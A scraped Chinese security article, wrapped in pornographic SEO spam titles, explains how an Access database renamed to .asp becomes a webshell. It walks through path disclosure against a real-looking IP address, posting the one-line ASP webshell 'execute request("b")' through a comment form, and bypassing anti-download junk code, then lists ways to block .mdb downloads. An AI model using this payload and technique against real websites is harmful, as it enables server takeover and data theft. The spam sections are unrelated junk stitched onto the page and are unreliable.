婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > access改mdb為asp所帶來的災難 附mdb防下載方法

access改mdb為asp所帶來的災難 附mdb防下載方法
熱門標簽:智能電銷機器人適用于哪些行業 徐州人工智能電銷機器人好用嗎 長沙防封電銷卡品牌 地圖標注服務哪家好 西寧公司外呼系統平臺 騰訊地圖標注商戶關閉 地圖標注宅基地 武漢營銷電話機器人軟件 外呼系統還用卡么
先不說直接改后綴,直接可以用網快等工具直接下載,其實這樣你已經是為入侵者打開了大門。入侵者可以利用asp/asa為后綴的數據庫直接得到webshell。

一.思路

  大家都知道%%>為asp文件的標志符,也就是說一個asp文件只會去執行%%>之間的代碼,access+asp的web系統的所有數據都是存放在數據庫文件里(mdb文件),由于管理者把mdb文件改為了asp文件,如果我們提交的數據里包含有%%>,那當我們訪問這個asp數據庫的時候就會去執行%%>之間的代碼。這樣導致我們只提交惡意代碼給數據庫,那么asp后綴的數據庫就是我們的webshell了。

二.示例

  隨便找個目標,首先我們暴庫,看是不是asp后綴的數據庫:http://220.170.151.103/test/dlog%5cshowlog.asp?cat_id=5log_id=210


  返回:
復制代碼 代碼如下:

Microsoft VBScript 編譯器錯誤 錯誤 '800a03f6'
缺少 'End'

/iisHelp/common/500-100.asp,行242

Microsoft JET Database Engine 錯誤 '80004005'

'D:\log_mdb\%29dlog_mdb%29.asp'不是一個有效的路徑。 確定路徑名稱拼寫是否正確,以及是否連接到文件存放的服務器。

/test/conn.asp,行18


  我們提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp返回一堆的亂碼,這樣我們可以直接用網際快車等工具直接下載數據庫(這里我們不討論)。我們回到主頁看到有提供“網友評論”功能。我們注冊個用戶,發一條評論:

%execute request("b")%>

  這樣我們就把asp代碼:%execute request("b")%>寫入了數據庫,那么數據庫:就是我們的webshell咯。提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp在亂碼的最后我們看到:

復制代碼 代碼如下:

/iisHelp/common/500-100.asp,行242
Microsoft VBScript 運行時錯誤 錯誤 '800a000d'

類型不匹配: 'execute'

/test/dlog/log_mdb/%29dlog_mdb%29.asp,行1266


  注意:我們在向數據庫提交代碼時,代碼內容不可以太大。所以我們采用%execute request("b")%>。

三.其他一些問題和思路

  1.對于改了后綴為asp,還對數據庫里加入了%='a'-1%>等非法的asp代碼來徹底防止下載的數據庫,由于里面存在了非法的asp代碼,插入我們的webshell代碼后運行,將只會顯示前面非法代碼的錯誤,而不去執行我們shell的代碼。雖然這樣可以防止一定的攻擊,但還是存在一定的隱患,我們只要在出錯的代碼前加入兼容錯誤的代碼,就可以得到正確顯示執行我們插入的webshell代碼了。

  2.對于沒有改后綴的,也就是mdb文件,這樣我們可以先直接下載下來得到后臺密碼,進了后臺,可以利用數據庫備用改后綴為asp。

mdb防下載方法小結

1:在iis6下面 如果一個擴展名沒有被定義則 訪問的時候會出現文件沒有找到的404錯誤。
因此你可以將數據庫任意命名成一個絕對不會出現的文件名就可以達到安全的效果比如:xxxxx.xxxxxxxxxxx


2 將數據庫放在網站的外部,那絕對就不能訪問得到了。例如: e:/web/是你的網站
則把數據庫放在e:/

3 正如樓上所說的 將.mdb 改成 .asp 同時倒入一個特殊的表 包含 % 的二進制字符 這樣訪問文件出現 缺少腳本關閉符的提示。
4 或者將.mdb 改成.asp 同時用winhex打開 可以發現176以后有很長一部分 00 字符串 你隨便在處改成一段asp代碼 也可以實現防止下載,這樣也不影響數據庫功能。例如:
%
response.write("非法訪問")
response.end()
%>


現在在數據庫的名稱里 加上 “#” 和空格 都被破解了 比如“#” = “%35” 而空格 = “%20”

所以說 現在用這些已經不管用了。。


如果是自己的服務器的話就在IIS里設置一下:

新建一個空白的DLL文件,然后在IIS里添加映射,可執行文件選剛才建的這個DLL,擴展名填.mdb,保存后重啟一下IIS服務即可。
您可能感興趣的文章:
  • IIS下防止mdb數據庫被下載的實現方法
  • 九種防MDB數據庫被下載的方法小結

標簽:雅安 通化 通遼 荊門 普洱 巴彥淖爾 運城 鷹潭

巨人網絡通訊聲明:本文標題《access改mdb為asp所帶來的災難 附mdb防下載方法》,本文關鍵詞  access,改,mdb,為,asp,所,帶來,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《access改mdb為asp所帶來的災難 附mdb防下載方法》相關的同類信息!
  • 本頁收集關于access改mdb為asp所帶來的災難 附mdb防下載方法的相關信息資訊供網民參考!
    • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    成人免费视频一区| 666欧美在线视频| 免费在线视频一区| 国产成人精品综合在线观看| 欧美性一区二区| 亚洲欧美日韩国产综合在线| 免费高清在线一区| 一本色道久久综合亚洲aⅴ蜜桃| 日韩一级视频免费观看在线| 久久99这里只有精品| 99久久精品国产毛片| 不卡一区二区三区四区| 欧美日韩在线播放一区| 欧美一区二区在线看| 国产精品视频线看| 日本亚洲视频在线| 欧美日韩精品电影| 国产精品区一区二区三| 国产一区二区三区av电影| 在线看日韩精品电影| 久久免费偷拍视频| 国产精品久久精品日日| 国产麻豆成人传媒免费观看| 久久精品免视看| 激情欧美一区二区| 日韩视频在线一区二区| 日韩激情视频在线观看| 欧美日韩在线免费视频| 亚洲成av人片一区二区三区| 激情小说欧美图片| 精品久久久久99| 国产专区综合网| 国产精品久久久久婷婷二区次| 韩国欧美国产1区| 日韩欧美在线网站| 一区二区不卡在线播放| 成人免费毛片a| 56国语精品自产拍在线观看| 69堂精品视频| 成人欧美一区二区三区| 国产精品久久久久桃色tv| 高清在线成人网| 亚洲婷婷在线视频| 91亚洲精华国产精华精华液| 亚洲欧美国产77777| wwwwww.欧美系列| 欧美在线观看视频在线| 免费成人在线视频观看| 亚洲伦理在线免费看| 日韩亚洲欧美一区二区三区| 91浏览器在线视频| 成人av电影在线| 国产乱对白刺激视频不卡| 午夜精品久久久久久不卡8050| 国产精品人妖ts系列视频| 欧美一区二区在线观看| 欧美日韩国产乱码电影| 欧美视频在线播放| 欧美日韩国产综合草草| 欧美日韩一区二区三区在线看| 日本韩国一区二区| 欧美色综合网站| 555www色欧美视频| 欧美电影免费观看高清完整版在 | 成人视屏免费看| 另类小说视频一区二区| 久久97超碰色| 成人精品一区二区三区四区| 国产成人精品三级麻豆| av欧美精品.com| 欧美三级欧美一级| 久久亚洲精华国产精华液| 国产精品久久久久久久蜜臀| 亚洲一区二区三区四区不卡 | 欧美色视频在线| 日韩欧美亚洲国产另类| 国产亚洲午夜高清国产拍精品| 欧美日韩国产精品成人| 欧美日韩亚洲综合一区 | 麻豆精品国产91久久久久久| 丁香婷婷综合网| 欧美午夜影院一区| 国产精品午夜免费| 免费看欧美美女黄的网站| 在线亚洲欧美专区二区| 久久久噜噜噜久久人人看| 亚洲18女电影在线观看| 成人禁用看黄a在线| 久久精品在线观看| 精品一区二区三区在线观看| 在线不卡一区二区| 午夜精品一区二区三区三上悠亚 | 天堂蜜桃91精品| 色综合久久中文字幕综合网| 久久久美女艺术照精彩视频福利播放| 欧美激情在线观看视频免费| 国产精品不卡视频| 激情六月婷婷综合| 2020国产精品| 粉嫩av一区二区三区粉嫩| 欧美日韩精品一区二区天天拍小说| 亚洲永久免费视频| 成人一级片网址| 亚洲激情自拍视频| 亚洲地区一二三色| 91年精品国产| 亚洲综合视频在线| 欧美亚洲尤物久久| 国产精品一线二线三线| 亚洲一区二区三区中文字幕在线| 经典三级一区二区| 99久久久国产精品| 欧美视频一区二区| 欧美日韩免费电影| 男男成人高潮片免费网站| 国产一区二区三区最好精华液| 免费在线欧美视频| 国内精品国产成人国产三级粉色| 国产免费观看久久| 欧美一区二区大片| 日本韩国精品一区二区在线观看| 亚洲成人精品一区二区| 国产欧美日韩亚州综合| 欧美videos中文字幕| 日韩欧美在线1卡| 国产日韩欧美精品在线| 日韩视频一区二区三区| 欧美精品自拍偷拍| 精品毛片乱码1区2区3区| 欧美一区二区三区日韩视频| 日韩视频免费观看高清完整版| 日韩一区二区在线免费观看| 久久精品一二三| 自拍视频在线观看一区二区| 亚洲一卡二卡三卡四卡五卡| 日韩成人午夜电影| 国产丶欧美丶日本不卡视频| 91麻豆免费在线观看| 欧美tk—视频vk| www国产成人免费观看视频 深夜成人网| 国产精品视频线看| 蜜臀精品久久久久久蜜臀 | 国产成人精品在线看| 国产成人啪免费观看软件| 亚洲免费在线观看| 男女激情视频一区| 欧美日韩专区在线| 亚洲精品免费在线播放| 国产精品精品国产色婷婷| 午夜视频在线观看一区二区| 91在线精品一区二区三区| 国产精品久久久久国产精品日日| 日本vs亚洲vs韩国一区三区二区| 精品影视av免费| 久久久99精品久久| 亚洲国产一二三| 在线免费观看视频一区| 三级影片在线观看欧美日韩一区二区| 国产一区二区剧情av在线| 99久久伊人网影院| 欧美一区二区三区四区五区| 日韩精品综合一本久道在线视频| 一区二区三区在线观看国产| 国产精品一色哟哟哟| 欧美精品日韩一区| 午夜影视日本亚洲欧洲精品| 日本中文字幕一区| 国产乱子轮精品视频| 日本午夜一本久久久综合| 亚洲国产精品传媒在线观看| 国产精品久久久久久亚洲毛片| www.亚洲在线| 视频一区免费在线观看| 日韩欧美一区中文| 国产精品1区二区.| 奇米精品一区二区三区在线观看一| 不卡的电影网站| 精品成人a区在线观看| 成人开心网精品视频| 国产综合色视频| 石原莉奈一区二区三区在线观看| 欧美精品视频www在线观看| 日韩—二三区免费观看av| 久久久久国产精品麻豆| 99久久精品免费看| 亚洲影院理伦片| 国产精品人成在线观看免费| 成人av影视在线观看| 久久99精品久久只有精品| 午夜电影一区二区| 日韩毛片在线免费观看| 久久先锋影音av鲁色资源| 国产欧美在线观看一区| 亚洲精品视频在线看| 69久久99精品久久久久婷婷 | 欧美成人免费网站| 91尤物视频在线观看| 青草av.久久免费一区| 亚洲成人免费看| 亚洲一级二级在线|